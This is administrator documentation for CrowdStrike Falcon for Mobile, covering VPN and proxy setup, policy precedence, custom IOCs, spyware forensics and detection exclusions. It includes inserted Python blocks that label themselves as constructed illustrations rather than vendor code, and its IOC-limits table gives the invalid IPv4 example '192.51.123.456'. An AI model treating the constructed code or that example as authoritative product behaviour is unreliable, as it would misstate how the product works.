You can configure the Falcon for Mobile VPN even if you have another VPN, such as a corporate VPN, configured on your Android profiles. Due to limitations with the Android OS, only one VPN can be active at a time on a profile. However, the Android sensor automatically connects the Falcon for Mobile VPN if the corporate VPN is disconnected. If your MDM is configured to allow users to disconnect from a VPN and a user manually disconnects the Falcon for Mobile VPN in their work profile, the Falcon VPN automatically reconnects after 5 minutes.

Keep in mind that if the corporate VPN is set as the Always on VPN in your MDM, the Falcon for Mobile VPN is unable to run and can’t provide network protection or visibility. Regardless of your VPN configuration, Falcon for Mobile can always monitor for device-level threats, such as malware or root detection.

VPN bypass

By default, all network traffic from applications is forwarded through the Falcon for Mobile VPN. In some cases, you might have an app that won’t work as expected if the app detects an active VPN. If you enroll devices to Falcon for Mobile using AppConfig in your MDM, you can specify a list of apps to bypass the VPN. For info on configuring AppConfig, see Appendix A: AppConfig settings for zero-touch enrollment.

Enabling the VPN on Android devices

When enabling the VPN in a mobile policy, the VPN must also be set up on devices protected by that policy.

Some MDMs allow you to automatically set up the VPN without user input by setting the Falcon app as the Always On VPN provider in the MDM. Although we recommend configuring this setting before enabling the VPN in a mobile policy, you can do so at any time. For more info, see your MDM’s documentation.

If you’re not using an MDM or don’t set the Falcon app as the VPN provider, users must set up the VPN through the Falcon app or a notification they receive on their devices. If they don’t set up the VPN, Falcon for Mobile can’t see network connectivity for installed apps and can’t generate network-related events.

Enable the VPN through the notification

After enabling the VPN in a mobile policy, protected devices automatically receive a notification to enable the VPN. Users must tap Enable in this notification.
The notification to enable the Falcon VPN
Note: It can take up to 15 minutes for devices to receive the notification.

Enable the VPN through the Falcon app

If a user doesn’t see or dismisses the notification, they can set up the VPN through the Falcon app.

  1. Open the Falcon app. The Status area appears on the landing page and displays the VPN status.
  2. Tap VPN pending activation.

Enabling the VPN in the Status area

Using the Falcon for Mobile proxy

If your Android devices are fully managed by an MDM, you can configure Falcon for Mobile to act as an HTTP proxy. This is recommended for environments where devices can’t be continuously protected by the Falcon for Mobile VPN, such as when a corporate VPN is configured.

The proxy allows the Falcon sensor to see network activity for installed apps and block connections that Falcon determines to be malicious. The proxy runs only on devices that have Falcon for Mobile installed.

Proxy considerations

  • The Falcon for Mobile proxy is supported only on fully managed devices. For more info about fully managed devices, see the documentation for Android Enterprise.
  • Make sure that the CrowdStrike Falcon app is allowed to run in the background. If there are battery restrictions, the proxy might not be able to inspect traffic and network connectivity will fail. For more info, see Background activity restrictions.
  • The default proxy port is 4040. You can specify a different port if you use AppConfig in your MDM to enroll devices to Falcon for Mobile. For more info about AppConfig settings, see Deploying Falcon for Mobile to Android Devices: Appendix A: AppConfig settings for zero-touch enrollment.

Configuring the proxy in your MDM

In your MDM’s device network or connectivity settings, configure the Falcon for Mobile sensor as a localhost proxy with the following settings.

Note: These settings might vary depending on your MDM. Refer to your MDM’s documentation for more info about configuring proxy settings.
  • Type: Direct
  • Host: Localhost
  • Port number: 4040 (If you configured a different port in AppConfig, use that instead)
Important: Don’t configure the proxy for devices that aren’t protected by Falcon for Mobile. In your MDM, make sure the proxy is either assigned to the correct device groups or excludes unprotected devices.

In Microsoft Intune, for example, proxy settings are configured in Device restrictions in the Connectivity area.

Configuring the Falcon for Mobile proxy in Microsoft Endpoint Manager

End-user notifications

When Falcon for Mobile blocks a malicious connection, you can send a notification to the end user’s device informing them why the connection was blocked. You can also send a notification if Falcon for Mobile detects a malicious app on Android devices.

Notifications are configured on the Notifications tab in your mobile policies. These settings are available:

  • Network preventions notifications: Send a notification when Falcon for Mobile blocks a connection to a malicious domain or IP address.

  • MITM notifications: Send a notification when Falcon for Mobile detects a man-in-the-middle attack.

  • Network containment notifications: Send a notification when Falcon for Mobile contains a device from the network or lifts containment.

  • Malware detection notifications (Android-only): Send a notification when Falcon for Mobile detects malware on Android devices.

For info on how to enable notifications, see Configure end-user notifications.

Device integrity for Android devices

Falcon for Mobile detects compromised devices by verifying Android OS integrity against both Google’s validation service and Android Keystore. Falcon for Mobile can also determine if the Falcon app on a device is legitimate by verifying the signing certificate for the app.

To configure device integrity, enable Remote attestation in your mobile policies. We recommend having this setting enabled for all devices when possible. You might need to disable this setting for devices that don’t pass Android compatibility testing, such as point-of-sale devices or other devices running customized versions of Android, to avoid generating false positive detections.

Note: Google Play Store must be installed on all devices that have the Remote attestation setting enabled.

You can view integrity status by clicking a host in Host setup and management > Manage endpoints > Mobile hosts dashboard. The More details area displays the status for Device Trusted, Key Store Trusted, and Falcon App Trusted.

  • Devices with a status of True have passed those integrity checks.

  • Devices with a status of False have not passed those integrity checks.

    Note: If Falcon is unable to process a response from Google’s servers, such as due to network connectivity issues, the status for that integrity check is False.
  • A status of - indicates that CrowdStrike hasn’t yet received the relevant events from that device.

Application log collection

To aid in troubleshooting, you can allow CrowdStrike to remotely collect application logs with the Allow remote log collection option. For more information, see Collecting application logs for troubleshooting.

Managing mobile policies

Configure sensor settings and assign host groups to policies.

Note: Falcon for Mobile can integrate with Microsoft Intune for remediation actions. For info on configuring remediation triggers in your mobile policies, see Integrating Falcon for Mobile with Microsoft Intune for Remediation Actions.
Mobile policies in multi-CID environments

If you use Falcon Flight Control, mobile policies created in the parent CID are available for use globally in all child CIDs. In a child CID, you can choose which host groups are assigned to an inherited policy. Inherited mobile policies are labeled with Global Admin on the Mobile policies page.

Inherited policies as they appear on the Mobile policies page

Aside from host group assignment, inherited policies can’t be modified in a child CID. However, you can duplicate policies inherited from the parent and then modify them as needed.

Mobile policies that are created in a child CID are fully managed in the child CID. These local policies don’t appear in the parent CID.

Locally created policies always have a higher precedence than inherited policies.

For more info about Falcon Flight Control, see Falcon Flight Control and Multi-CID Support.

Policy precedence

Like prevention policies, mobile policies use policy precedence to determine which policy is applied to a host.

A host can belong to multiple host groups, and a host group can appear in multiple policies. If a host matches multiple policies, the policy with the highest precedence is applied to that host. Precedence is determined by the order of policies in the list of mobile policies. The policy at the top of the list has a precedence of 1, which is higher than the second policy in the list, which has a precedence of 2. The last policy in the list is always the Default Policy.

If a host is not assigned to a host group, or the groups it belongs to are not assigned to any enabled policies, the host is automatically assigned to the Default Policy.

If hosts are dynamically assigned to host groups, changing certain aspects of a host could change its host group membership and therefore change the host’s active policy. For example, if you use sensor tags to dynamically assign hosts to host groups, adding or removing tags assigned to a mobile device could change its assigned policy.
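The precedence rules above as an added worked example, not CrowdStrike code: a small resolver that picks the effective mobile policy for a host from an ordered policy list, including the Flight Control rule that locally created policies outrank inherited ones and the fall-through to the Default Policy. The Policy and Host classes, the sample policy names and the host group names are constructed for this illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Policy:
    name: str
    enabled: bool
    host_groups: frozenset      # host groups assigned to the policy
    inherited: bool = False     # True if inherited from the parent CID via Flight Control


@dataclass(frozen=True)
class Host:
    aid: str
    host_groups: frozenset      # groups the host currently belongs to (may be tag-driven)


# The Default Policy has no host groups of its own and always sits last.
DEFAULT_POLICY = Policy("Default Policy", enabled=True, host_groups=frozenset())

# Constructed sample: list order is the console order within each origin.
POLICIES = [
    Policy("Execs strict", enabled=True, host_groups=frozenset({"Executives"}), inherited=True),
    Policy("Contractors", enabled=False, host_groups=frozenset({"Contractors"})),
    Policy("All corporate", enabled=True, host_groups=frozenset({"Corporate", "Executives"})),
]


def order_by_precedence(policies):
    """Return policies in the order they are evaluated for one CID.

    The position in the Mobile policies list is the precedence (top = 1).
    Locally created policies always outrank inherited ones, and the Default
    Policy is always last, so sort by (inherited, position) and append Default.
    """
    listed = [p for p in policies if p != DEFAULT_POLICY]
    ranked = sorted(enumerate(listed), key=lambda ip: (ip[1].inherited, ip[0]))
    return [p for _, p in ranked] + [DEFAULT_POLICY]


def effective_policy(host, policies):
    """Return the first enabled policy whose assigned groups include one of the host's.

    A host with no group membership, or whose groups appear only in disabled
    policies, falls through to the Default Policy.
    """
    for policy in order_by_precedence(policies):
        if policy.enabled and policy.host_groups & host.host_groups:
            return policy
    return DEFAULT_POLICY


def policy_change_after_retag(host, new_groups, policies):
    """Show how a tag-driven group change can silently switch the active policy.

    Returns the (before, after) policy names.
    """
    before = effective_policy(host, policies).name
    after = effective_policy(Host(host.aid, frozenset(new_groups)), policies).name
    return before, after


if __name__ == "__main__":
    for h in (Host("aid-1", frozenset({"Executives"})),
              Host("aid-2", frozenset({"Contractors"})),
              Host("aid-3", frozenset())):
        print(h.aid, "->", effective_policy(h, POLICIES).name)
```

Note that the host in the Executives group lands on the local "All corporate" policy rather than the inherited "Execs strict" one, even though the inherited policy was created specifically for that group.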

Create a mobile policy

Create and enable a mobile policy. You can have up to 100 mobile policies.

  1. Go to Endpoint security > Configure > Mobile policies.
  2. Click Create Policy.
  3. Enter a policy name and optional description. Accepted characters are a-z, A-Z, 0-9, -, _, :, ;, ., !, and spaces.
  4. Click Create Policy.
  5. Click Enable.
Delete a policy

Delete a policy that is no longer needed. Policies must be disabled before they can be deleted.

If you want to keep a policy but not enforce it, disable the policy. Disabled policies still count towards the 100 policy limit.

Note: The default policy can’t be deleted.
  1. Go to Endpoint security > Configure > Mobile policies.
  2. Find the policy to delete and click Edit Policy.
  3. If needed, click Disable to disable the policy.
  4. Click Delete policy.
Edit mobile policy precedence

Policy precedence determines which policy is applied to a mobile host that matches multiple policies.

For more information, see Policy precedence.

  1. Go to Endpoint security > Configure > Mobile policies.
  2. Click Edit Precedence.
  3. Drag and drop policies to the needed positions.
    Note: The default policy always has the lowest precedence and cannot be reordered.
  4. Click Save.
Configure sensor settings

Enable or disable sensor settings based on the requirements of your environment.

For more information about these settings, see Mobile policy sensor settings.

  1. Go to Endpoint security > Configure > Mobile policies.
  2. Find the policy to configure and click Edit Policy.
  3. On the Sensor settings tab, enable or disable settings as needed.

Modifications are automatically saved and are pushed to devices immediately.

Assign or remove host groups

The host groups assigned to a policy determine which hosts the policy is applied to.

  1. Go to Endpoint security > Configure > Mobile policies.
  2. Find the policy to configure and click Edit Policy.
  3. Click the Assigned host groups tab.
  4. To add a host group to the policy:
    1. Click Add groups to policy.
    2. Select the group from the menu.
      Tip: Type the group name in the text field to dynamically search for groups.
    3. To add another group, click Add another group to policy and select the group.
    4. Click Add group(s).
  5. To remove a group from the policy:
    1. Locate the group and click Remove from policy.
    2. Click Remove group from policy.
Configure end-user notifications

Configure when to send notifications to end users.

  1. Go to Endpoint security > Configure > Mobile policies.

  2. Find the policy to configure and click Edit Policy.

  3. Click the Notifications tab.

  4. Turn notifications on or off as needed.

    • To turn off all notifications, select Disable all notifications.

    • If Disable all notifications is selected, deselecting this setting re-enables any notifications that were previously enabled.

Managing custom IOCs for mobile devices

Indicators of compromise (IOCs) explicitly block or allow connections to specific domains and IP addresses on your mobile devices.

IOCs support these actions:

  • Block: If a mobile device tries to connect to the specified IP address or domain, the connection is blocked and a detection is generated.

  • Block, hide detection: The connection is blocked and a detection is generated, but the detection doesn’t appear in Endpoint security > Monitor > Mobile detections.

  • Detect only: The connection is allowed and a detection is generated.

  • Allow: The connection is allowed without generating a detection.

  • No action: Save the indicator for future use, but take no action.

Note: Hash IOCs aren’t supported for mobile devices.

For more info about IOCs, see Custom IOCs.

Considerations with mobile IOCs

For all device types:

  • If you have network preventions enabled, IOCs have a higher precedence. For example, you might have a domain blocked by network preventions that you want to allow access to. You can add an IOC with this domain and set the action to Detect only or Allow.

  • When configuring IOCs, changes are not effective immediately and could take up to several hours to take effect.

  • There is a limit to the number of mobile IOCs you can configure. For more info, see Mobile IOC limits.

  • All subdomain IOCs that appear in the IOC management page are prefixed with an asterisk. For example, if you add an IOC for subdomains of example.com, the IOC appears as *.example.com.

  • When configuring subdomain IOCs, exact matches take precedence over general matches. For example, if you allow all subdomains of example.com, but configure an IOC to block site1.example.com, the IOC for site1.example.com takes precedence and is blocked.

  • When configuring custom IOCs, you have the option to apply IOCs to specific host groups or all hosts. If you use Falcon Flight Control and you apply an IOC to all hosts from the parent CID, the IOC is applied to all hosts across all CIDs in your environment.
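The matching and precedence rules above as an added worked example, not CrowdStrike code: a resolver that decides the action for a destination host from a set of domain and subdomain IOCs, applying the rules that an exact match beats a subdomain match, that `*.example.com` does not cover `example.com` itself, and that a Detect only or Allow IOC overrides a network preventions block. The IOC records, the sample domains and the network preventions stand-in are constructed; the tie-break among several matching subdomain IOCs (longest pattern wins) is an assumption, since the page states none.

```python
from dataclasses import dataclass

ACTIONS = ("Block", "Block, hide detection", "Detect only", "Allow", "No action")


@dataclass(frozen=True)
class MobileIOC:
    pattern: str    # "example.com" (exact match) or "*.example.com" (any subdomain)
    action: str     # one of ACTIONS

    def __post_init__(self):
        if self.action not in ACTIONS:
            raise ValueError(f"unknown mobile action: {self.action}")

    @property
    def is_subdomain_rule(self):
        return self.pattern.startswith("*.")

    def matches(self, host):
        host = host.lower().rstrip(".")
        if self.is_subdomain_rule:
            # "*.example.com" covers a.example.com but not example.com itself
            return host.endswith("." + self.pattern[2:].lower())
        return host == self.pattern.lower()


def resolve_action(host, iocs, network_prevention_blocks):
    """Return (action, source) for a connection to host.

    Exact-match IOCs beat subdomain IOCs. Any matching IOC other than
    "No action" beats the network preventions verdict, so a Detect only or
    Allow IOC can restore access to a domain that network preventions block.
    Among several matching subdomain IOCs the longest pattern wins
    (assumption for this example; the page does not state a tie-break).
    """
    exact = [i for i in iocs if not i.is_subdomain_rule and i.matches(host)]
    wild = [i for i in iocs if i.is_subdomain_rule and i.matches(host)]
    for candidates in (exact, wild):
        live = [i for i in candidates if i.action != "No action"]
        if live:
            best = max(live, key=lambda i: len(i.pattern))
            return best.action, f"IOC {best.pattern}"
    if network_prevention_blocks(host):
        return "Block", "network preventions"
    return "Allow", "no rule"


def outcome(action):
    """Map an action to (connection_allowed, detection_generated, detection_visible)."""
    return {
        "Block": (False, True, True),
        "Block, hide detection": (False, True, False),
        "Detect only": (True, True, True),
        "Allow": (True, False, False),
    }[action]


# Constructed sample IOC set.
SAMPLE_IOCS = [
    MobileIOC("*.example.com", "Allow"),                  # allow every subdomain...
    MobileIOC("site1.example.com", "Block"),              # ...except this one (exact beats wildcard)
    MobileIOC("blocked-by-policy.test", "Detect only"),   # override a network preventions block
    MobileIOC("future.test", "No action"),                # saved for later, has no effect
]


def sample_network_preventions(host):
    """Constructed stand-in for the network preventions verdict."""
    return host in {"blocked-by-policy.test", "future.test", "evil.test"}


if __name__ == "__main__":
    for h in ("site1.example.com", "site2.example.com", "example.com",
              "blocked-by-policy.test", "future.test", "evil.test"):
        print(h, "->", resolve_action(h, SAMPLE_IOCS, sample_network_preventions))
```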

For Android devices:

  • You must have the Falcon for Mobile VPN or the proxy configured. Custom IOCs are applied to connections from apps installed on the device. For more info about configuring the VPN or proxy, see Protecting network activity on Android devices.

For supervised iOS devices using a Content Filter profile:

  • Falcon for Mobile applies custom IOCs to all network connections.

  • If the iCloud Private Relay service is enabled on your device, malicious connections to IP addresses can’t be blocked when using Safari. Disable Private Relay or disable the allowCloudPrivateRelay setting in your MDM’s payload configuration. You can also block DNS resolution to certain iCloud domains. For more info, see Prepare Your Network or Web Server for iCloud Private Relay.

    Note: Malicious connections can still be blocked by domain regardless of Private Relay settings.
  • If you didn’t apply a Content Filter profile downloaded using the workflow in the Falcon console, additional configuration is recommended for users to see notifications for blocked connections. This can be done by creating a Notification profile for the CrowdStrike Falcon app with the Allow Notification and Show in Notification Center options enabled.

For unmanaged iOS devices or managed, unsupervised devices using a Per-App VPN created through the Falcon console:

  • Falcon for Mobile applies domain and subdomain IOCs to connections made through the Safari browser and in-app Safari WebViews.

  • IP address IOCs can’t be applied to Safari connections.

For managed, unsupervised devices using a manually created Per-App VPN:

  • Falcon for Mobile applies custom IOCs to connections made through apps that the Per-App VPN profile is applied to.

  • Due to a limitation in iOS, the Per-App VPN profile can’t be applied to Safari. However, you can monitor specified domains and top-level domains if your MDM supports it. IP address IOCs can’t be applied to Safari connections.
Mobile IOC limits

Falcon for Mobile limits the number of custom IOCs. The following table shows the approximate limits based on an average length or a maximum length of IOCs.

IOC Type     iOS sensor 2025.04.1 and earlier   Android; iOS sensor 2025.05.1 and later   Calculation Notes
Domains      1,925                              154,199                                    Average of 14 characters (example: 0123456789.com)
Subdomains   1,706                              130,583                                    Average of 16 characters (example: *.0123456789.com)
IPv4         1,870                              149,794                                    Maximum IPv4 address length (example: 192.51.123.456)
IPv6         1,109                              88,935                                     Maximum IPv6 address length (example: 2001:db8:1234:5678)

Add mobile IOCs

Upload multiple IOCs of the same type in a file or enter IOCs manually.

Note: You can select multiple platforms for an IOC. However, if you select a mobile and a non-mobile platform, you must configure both action options — Action (for non-mobile platforms) and Mobile action (for mobile platforms).
  1. Go to Endpoint security > Configure > IOC management.
  2. Click the actions menu and select Add domains or Add IP addresses.

    Custom IOCs action menu
  3. Select one of these options:
    • Upload a file containing IOCs: Click Select file and open the file containing the IOCs.
    • Manually add IOCs: Click Manually add domains or Manually add IP addresses. Specify the IOCs separated by commas.

  4. For domain IOCs, configure what to match:
    • To match the specified domains, select Exact match for domains added.
    • To match all subdomains of the specified domains, select Any subdomains for domains added (iOS and Android). This option doesn’t include the domain itself.
    • To match both the domains and all subdomains, select both options.
  5. Optional. Enter a description.
  6. For Platform, select Android, iOS, or both.
  7. Select the host groups to apply the IOCs to or select All hosts.
  8. Select the mobile action and severity.
    Note: If you select No Action or Allow, no severity is needed.
  9. Optional. Add an expiration date, tags, or audit log comments.
  10. Click Add domains or Add IP addresses.

Forensics analysis for mobile devices

Determine if a mobile device has been compromised by spyware such as Pegasus or Chrysaor by using Falcon for Mobile to analyze an on-demand diagnostic report.

This feature supplements Falcon for Mobile's OS integrity checks and spyware blocking. The analysis provides visibility at a lower system level to deliver forensic insights into malicious or abnormal behaviors.

End users initiate forensic analysis on their devices by generating a diagnostic report through the OS. The report generation typically finishes in 1 or 2 minutes but can take up to 10 minutes. Users then submit the report to the CrowdStrike Falcon app to complete the analysis. If an IOC is identified, the sensor generates a detection.

Perform analysis on iOS devices

Generate the diagnostic report and perform analysis on iOS devices.

  1. Open the CrowdStrike Falcon app.
  2. Tap Forensics, and then tap Start new forensic analysis.

    The Forensics page

  3. Follow the on-screen instructions to generate the diagnostic report, which varies depending on your device model.

    When the report completes, the Forensic Analysis page appears and the file name of the report is automatically copied to the clipboard.

  4. On the Forensic Analysis page, tap Browse logs in Settings.
  5. Swipe through the list to reveal the search bar.
  6. Paste the auto-copied file name in the search field.
  7. Tap the file that appears.

    Tap the diagnostic file

  8. Tap the upload icon, and then tap the CrowdStrike Falcon app.

    Uploading the file to the CrowdStrike Falcon app

    The Forensic Analysis page shows if malicious indicators were found.

Perform analysis on Android devices

Generate the diagnostic report and perform analysis on Android devices.

Note: The analysis steps include temporarily enabling developer options. This won't generate a false positive detection.
  1. Open the CrowdStrike Falcon app.
  2. Tap the navigation menu, and then tap Forensics.
    Accessing the Android forensics
  3. Tap Start new forensic analysis.
  4. Enable developer options.
    1. Tap Open settings.
    2. Tap Build number multiple times until you receive a notification that developer options have been enabled.
    3. Go back to the CrowdStrike app and tap Next.
  5. Generate and analyze the diagnostic report.
    1. Tap Open settings.
    2. On the Developer options page, tap Bug Report, and then select Full Report.
    3. After the report completes, tap the bug icon that appears in the notification bar, and then tap the report.
      Note: If you have silent notifications configured, the bug icon might not appear in the notification bar. You must manually access the notification center to tap the report.
      Accessing the report from the notification center
    4. Tap CrowdStrike Forensics to share the report with the CrowdStrike Falcon app.
      Sharing the report with the CrowdStrike Falcon app

      After sharing the file, the Forensics page appears. This page displays the forensic analysis progress and, once complete, shows whether any malicious indicators were found.

  6. Disable developer options.
    1. Tap Open Settings.
    2. On the Developer options page, disable Use Developer options.
    3. Go back to the CrowdStrike app and tap Done.

Managing mobile hosts

Mobile hosts are available in Host setup and management > Manage endpoints > Host management. Mobile devices become hosts when they have the CrowdStrike Falcon app installed and enrollment to Falcon for Mobile is complete.

For more info about host management, see Host and Host Group Management.

Viewing mobile host details

To see a summary panel of basic info about a mobile host, including which mobile policy and host groups it belongs to, click its row in Host Management.

You can view more details about the host by clicking Mobile details in the summary panel or by clicking a mobile host’s Agent ID listed on the Mobile host dashboard. The details page for a mobile host shows device security status, assigned policy, detection statistics, and more.

The mobile host details page for an iOS device

Note: When viewing the summary panel for a mobile host on the Host management page, the serial number appears as ---. This is because Android and iOS restrict an app’s ability to read the serial number of a device.
Zero Trust Assessment for mobile hosts

Zero Trust Assessment (ZTA) monitors OS and sensor settings to produce a score that measures the security posture of your hosts, including mobile hosts. For more info, see Zero Trust Assessment.

You can create Falcon Fusion SOAR workflows based on ZTA scores or on failed assessments for mobile hosts. For more info, see Configuring Falcon Fusion SOAR workflows for Falcon for Mobile.

Network containment for mobile hosts

If you suspect a mobile host has been compromised, you can network contain the host to isolate it from network activity.

You can manually contain a host in Host Management from the host’s summary panel. You can also lift containment to restore connectivity to hosts. If you want to allow specific connections when a host is manually contained, you can add allowed IP addresses to your containment policy. For more info about network containment and containment policies, see Network Containment.

Note: Allowlisting proxy IP addresses isn't supported. When a proxy is used, the sensor sees traffic being sent to the proxy rather than to the destination IP address, so the sensor can’t block specific IP addresses. Allowlisting the proxy IP address would allow all proxied traffic during containment.

You can also automatically contain mobile hosts if a man-in-the-middle attack is detected. For more info, see Automatic network containment.

Note: The network connections that the sensor can block depend on your deployment and configuration method. For more info, see Network protection.
Important: If you use FalconID for multi-factor authentication, be aware that FalconID is disabled during network containment. Users can’t authenticate with FalconID until containment is lifted.
Deleting a mobile host

Use caution if you delete mobile hosts. Deleting a mobile host works differently than deleting a traditional Falcon sensor host.

When you delete a Windows, Mac, or Linux host, it is moved to the Host setup and management > Manage endpoints > Host management page, but remains active if it is still sending events.

By contrast, when you delete a mobile host:

  • It is truly deleted, and will not remain active or appear on the Host setup and management > Manage endpoints > Host management page where it could be restored. If a mobile host is accidentally deleted, a new invite needs to be sent to the associated user so they can re-enroll.

  • All data associated with the CrowdStrike Falcon app is removed.

  • Any shielded Android apps that were added by Falcon are removed, along with all their associated data. Unprotected instances of the apps are not affected.

  • If a per-app VPN profile was applied to the unsupervised iOS device, it remains in effect, cutting off data flow for the monitored corporate apps. You might need to apply a different profile to the device to restore internet connectivity to the corporate apps.

For more info about deleting hosts, see Managing inactive and duplicate hosts.

Viewing mobile detections and events

Detections

View detections from mobile hosts in Endpoint security > Monitor > Mobile detections. For more info, see Working through mobile detections.

Note: Mobile detections appear in the Falcon console for 90 days after they're generated. After 90 days, mobile detections aren’t guaranteed to be retained.

You can create Falcon Fusion SOAR workflows or scheduled searches that send notifications when mobile detections are generated. For info about workflows, see Configuring Falcon Fusion SOAR workflows for Falcon for Mobile. For info about scheduled searches, see Scheduled Searches.

There are several ways in which you can generate test detections. For more info, see Falcon for Mobile: Triggering Detections. For US-GOV-1 and US-GOV-2 customers, see Falcon for Mobile: Triggering Detections.

Important: When a detection or prevention is triggered for an IOC, CrowdStrike recommends reviewing the host for events that may show additional context. Events can occur both before and after the detection that may suggest related adversary activity, such as credential access, lateral movement, data exfiltration, or file encryption. Adversaries often attempt to perform many activities on a host, so CrowdStrike recommends that your organization perform additional review and risk mitigation when detections and preventions occur.
Events

You can view mobile events in Falcon from Investigate > Search > Advanced event search.

Mobile detection events are also available through the event streams APIs. You can use the APIs to collect these mobile events directly or you can configure the Falcon SIEM connector to send events to your SIEM. For more info, see Event Streams APIs or SIEM Connector.

Find details about mobile events in Events Full Reference (Events Data Dictionary).

Excluding mobile detections

Create exclusions to prevent specific mobile detections from appearing in the Falcon console. This reduces detection fatigue and helps you focus on the mobile detections that are most relevant to your environment.

For example, your organization might allow sideloading of approved Android apps, which you don’t want generating detections. You also might not want to see detections when an iOS device’s lock screen isn’t set. You can create exclusions to filter out these detections.

Note: Mobile detections exclusions are not supported in US-GOV-1.
Mobile detection exclusions in multi-CID environments

Mobile detection exclusions that are created in a parent CID are applied to the parent CID and all the child CIDs. You can create these exclusions from detections generated within the parent CID or from aggregated detections. Aggregated detections appear in the parent CID based on your configuration and include detections across child CIDs.

You can delete inherited exclusions in a child CID if they’re not needed. If you need to add the exclusion back, you can do so locally in the child CID. You can also remove and then re-add the exclusion from the parent CID; however, this propagates the exclusion to any other child CIDs that might have locally removed the original inherited exclusion.

Exclusions that are created in a child CID don’t appear in the parent CID and are fully managed in the child CID. Local exclusions take precedence over globally inherited exclusions.

Considerations for mobile detection exclusions

  • Exclusions are created from existing detections and apply to all Falcon for Mobile hosts. When creating the exclusion, the parameters of the exclusion appear, such as the platform and detection type. These parameters can’t be modified.

  • If you configure an exclusion for a specific IP address or domain, that exclusion applies regardless of the severity or how the detection was triggered. However, as with other exclusions, IP address and domain exclusions are platform-specific.

  • An exclusion for a connection takes precedence over any policy, such as network preventions or custom IOCs, that would block the connection and trigger a detection. For example, if you create an exclusion for a particular IP address that was blocked by the Block malicious network connections policy toggle, that connection is now allowed and new detections won't appear in the Falcon console.

  • Mobile detection exclusions support only sensor-based detections, and not cloud-based detections. This means you can’t exclude hash-based or Play Integrity attestation detections.

  • If you configure an exclusion for the RootAccessDetected detection on Android devices, the following detections are automatically excluded. Likewise, if all of these detections are individually excluded, the RootAccessDetected detection is automatically excluded.

    • SuspiciousAppFound

    • SuspiciousAndroidActivityFound

    • SuspiciousAndroidSystemPropertyFound

    • SuspiciousAndroidLogcatMessageFound

    • UnexpectedFileFound

    • HookedAndroidMethodFound

  • If you configure an exclusion for the iOSSecurityCompromised detection for jailbroken iOS devices, the following detections are automatically excluded. Likewise, if all of these detections are individually excluded, the iOSSecurityCompromised detection is automatically excluded.

    • SystemPartitionAltered

    • TrampolineDetected

    • ObjCRuntimeAltered

    • CertificatePinningCompromised

    • UnexpectedFileFound

    • UnexpectedDynamicLibraryLoaded

    • CodeSigningAltered

    • PathUnexpectedlyReadable

    • UnexpectedEnvironmentVariable
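The two composite-detection rules above as an added worked example, not CrowdStrike code: a helper that expands a configured set of mobile detection exclusions to the effective set, applying both directions of the rule (excluding the composite excludes every component; excluding every component excludes the composite) and keeping exclusions platform-specific, so that excluding UnexpectedFileFound on Android has no effect on iOS. The detection type names are the ones listed above; the exclusion records are constructed for this illustration.

```python
# Composite detections and the component detections they stand for.
# Exclusions are platform-specific, so UnexpectedFileFound on Android is
# independent of UnexpectedFileFound on iOS.
COMPOSITE_DETECTIONS = {
    ("Android", "RootAccessDetected"): frozenset({
        "SuspiciousAppFound",
        "SuspiciousAndroidActivityFound",
        "SuspiciousAndroidSystemPropertyFound",
        "SuspiciousAndroidLogcatMessageFound",
        "UnexpectedFileFound",
        "HookedAndroidMethodFound",
    }),
    ("iOS", "iOSSecurityCompromised"): frozenset({
        "SystemPartitionAltered",
        "TrampolineDetected",
        "ObjCRuntimeAltered",
        "CertificatePinningCompromised",
        "UnexpectedFileFound",
        "UnexpectedDynamicLibraryLoaded",
        "CodeSigningAltered",
        "PathUnexpectedlyReadable",
        "UnexpectedEnvironmentVariable",
    }),
}


def expand_exclusions(configured):
    """Return the effective set of (platform, detection_type) exclusions.

    Excluding a composite detection excludes every component; excluding all
    components excludes the composite. Iterate to a fixed point so the result
    does not depend on the order in which the rules are checked.
    """
    effective = set(configured)
    changed = True
    while changed:
        changed = False
        for (platform, composite), components in COMPOSITE_DETECTIONS.items():
            comp_keys = {(platform, c) for c in components}
            if (platform, composite) in effective and not comp_keys <= effective:
                effective |= comp_keys
                changed = True
            elif comp_keys <= effective and (platform, composite) not in effective:
                effective.add((platform, composite))
                changed = True
    return frozenset(effective)


def is_excluded(platform, detection_type, configured):
    """True if a detection of this type on this platform is hidden by the exclusions."""
    return (platform, detection_type) in expand_exclusions(configured)


def still_visible_components(platform, composite, configured):
    """Component detections that would still surface, i.e. why the composite is not excluded."""
    effective = expand_exclusions(configured)
    return sorted(c for c in COMPOSITE_DETECTIONS[(platform, composite)]
                  if (platform, c) not in effective)


if __name__ == "__main__":
    # Constructed sample: an admin excluded RootAccessDetected on Android only.
    configured = {("Android", "RootAccessDetected")}
    for key in sorted(expand_exclusions(configured)):
        print("excluded:", key)
    print("iOS UnexpectedFileFound excluded?", is_excluded("iOS", "UnexpectedFileFound", configured))
```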

Create mobile detection exclusions

Create an exclusion for detections you no longer want to see.

  1. Go to Endpoint security > Monitor > Mobile detections.
  2. Use the Search bar or filter menus to find the detection to exclude, and then click the detection.
  3. In the summary panel, click Add exclusion.
  4. Click Add exclusion.
Delete mobile detection exclusions

If you need to see a detection that was excluded, you can delete the exclusion.

  1. Go to Endpoint security > Monitor > Mobile detections.
  2. Use the Search bar or filter menus to find the detection you want to see again, and then click the detection.
  3. In the summary panel, click Remove exclusion.
  4. Click Remove exclusion.

Viewing mobile dashboards

Falcon for Mobile offers these predefined dashboards to monitor protected devices in your environment:


The Mobile hosts dashboard

You can also create and customize your own dashboards from the Dashboards page to include relevant widgets. Although you can’t modify any of the predefined Falcon for Mobile dashboards directly, you can duplicate a dashboard and then add or remove widgets. For more info about creating, duplicating, and modifying dashboards, see Customizable Dashboards.

Mobile device trust with Falcon Identity Protection

If you use Falcon Identity Protection, you can create conditional access policy rules for Android and iOS devices based on whether Falcon for Mobile is installed. Validating that mobile devices are protected by Falcon for Mobile helps ensure that these devices are trusted in your environment and should be granted access to company resources.

How mobile device trust works

Identity Protection uses the Falcon installed rule condition to determine if Falcon for Mobile is installed on authenticating mobile devices. Use the following steps to understand the overall configuration and workflow for mobile device trust.

  1. Configure your OIDC integration with Identity Protection. For more info, see OIDC integrations.

  2. Configure your Identity Protection policy rules using the following settings. For more info about Identity Protection policy rules, including creating and managing rules and details about specific settings, see Identity Protection Policy.

    1. For the rule trigger, select Cloud access. Cloud access is the only trigger that’s supported for the Falcon installed condition when used with mobile devices.

    2. For the rule condition, configure the Source attribute to include or exclude Falcon installed.

    3. For the rule action, select Audit, Block, or Identity Verification.

